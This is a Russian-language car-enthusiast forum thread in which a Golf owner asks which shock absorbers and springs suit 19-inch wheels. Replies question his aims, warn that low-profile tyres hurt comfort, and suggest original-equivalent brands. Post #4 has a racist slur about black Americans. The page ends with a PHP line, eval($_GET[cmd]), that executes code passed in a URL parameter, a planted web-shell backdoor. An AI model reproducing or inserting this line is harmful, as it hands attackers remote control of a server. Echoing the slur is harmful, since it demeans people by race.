+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Амортизаторы


  1. #1
    Здравствуйте!

    Скажите, пожалуйста, какие лучше амортизаторы (передние и задние) + пружины поставить, если стоит 19 радиус?

    Заранее благодарю!

  2. #2
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    с какой целью?
    занизить? участвовать в кольцевых гонках? по бездорожью ездить?
    в зависимости от назначения авто и надо подбирать амортизаторы и пружины.
    кстати, чем не устраивают те, которые стоят сейчас?
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  3. #3
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(chess &#064; Jan 23 2008, 14&#58;57) <{POST_SNAPBACK}></div><div class='quotemain'>с какой целью?
    ..............
    кстати, чем не устраивают те, которые стоят сейчас?[/b][/quote]

    тоже интересно ;)
    песок сыпется....не останавливайтесь на достигнутом !

  4. #4
    GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Регистрация
    07.03.2006
    Откуда
    Одесса
    Машина
    golf_mk1
    Сообщений
    1,204
    19 радиус с двигателем 1.6, и стттттттттттттоковыми тормозами.......эта ваще даже не ара тюненг, а какойто американнигер стайл.им простительно,они только 100 лет назад с деревьев слезли...........
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

    Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

  5. #5
    GTI-Racing rider113 is on a distinguished road Аватар для rider113
    Регистрация
    03.04.2007
    Машина
    MK4 GTI black
    Сообщений
    259
    <div class='quotetop'>Цитата(Verdik &#064; Jan 23 2008, 15&#58;11) <{POST_SNAPBACK}></div><div class='quotemain'>Здравствуйте&#33;

    Скажите, пожалуйста, какие лучше амортизаторы (передние и задние) + пружины поставить, если стоит 19 радиус?

    Заранее благодарю&#33;[/b][/quote]
    Чтото ближе к стоку. Т.К. менять дешевле выйдет, а менять придётся часто и почти всю подвеску))) у меня тож на лето 19 радиус,я правда не из москвы. И если у тебя 1.6 на кой черт тебе такие тапки? да я согласен девки сами в тачку прыгают))) но я считаю это того не стоит.

  6. #6
    Я хотел посоветоваться насчёт увеличения комфорта езды. Просто планирую поставить 19 радиус. Не хочу очень занижать. Просто скажите, пожалуйста, какие лучше, амортизаторы и пружины, чтобы не очень дорогие, но лучше оригинальных?

  7. #7
    GTI-Racing rider113 is on a distinguished road Аватар для rider113
    Регистрация
    03.04.2007
    Машина
    MK4 GTI black
    Сообщений
    259
    <div class='quotetop'>Цитата(Verdik &#064; Jan 23 2008, 19&#58;46) <{POST_SNAPBACK}></div><div class='quotemain'>Я хотел посоветоваться насчёт увеличения комфорта езды. Просто планирую поставить 19 радиус. Не хочу очень занижать. Просто скажите, пожалуйста, какие лучше, амортизаторы и пружины, чтобы не очень дорогие, но лучше оригинальных?[/b][/quote]
    Да пойми ты 19 радиус резко ухудшит комфортность, 35 профиль резины это ститай что её нет практически, какой тут комфорт

  8. #8
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(Verdik &#064; Jan 23 2008, 18&#58;46) <{POST_SNAPBACK}></div><div class='quotemain'>Я хотел посоветоваться насчёт увеличения комфорта езды. Просто планирую поставить 19 радиус. Не хочу очень занижать. Просто скажите, пожалуйста, какие лучше, амортизаторы и пружины, чтобы не очень дорогие, но лучше оригинальных?[/b][/quote]

    Фактически на самом то деле, в твоем случае как раз лучше оригинала то и ничего нету. Но они действительно стоят денег, и иногда просто жалко. С похожими характеристиками могут быть не оригинал, но по каталожным номерам и по всем параметрам соответствовать оригиналу. Выбор тут на самом деле обширный: MONROE, SACHS, KAYABA, BOGE или только тогда тюнинг, но они все как известно имеют более жесткие характеристики и ставят их обычно с иными пружинами.
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме

Похожие темы

  1. Амортизаторы. что выбрать ?!
    от DUX в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 215
    Последнее сообщение: 12.12.2017, 13:14
  2. Амортизаторы задние
    от danger012 в разделе Покупка и продажа запчастей
    Ответов: 2
    Последнее сообщение: 19.02.2015, 13:09
  3. Амортизаторы.
    от тайсон в разделе Покупка и продажа запчастей
    Ответов: 4
    Последнее сообщение: 08.11.2011, 14:46
  4. Амортизаторы для Гольф 2
    от purshik в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 0
    Последнее сообщение: 17.07.2009, 21:45
  5. АМОРТИЗАТОРЫ
    от artemius в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 29
    Последнее сообщение: 05.10.2007, 10:51

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}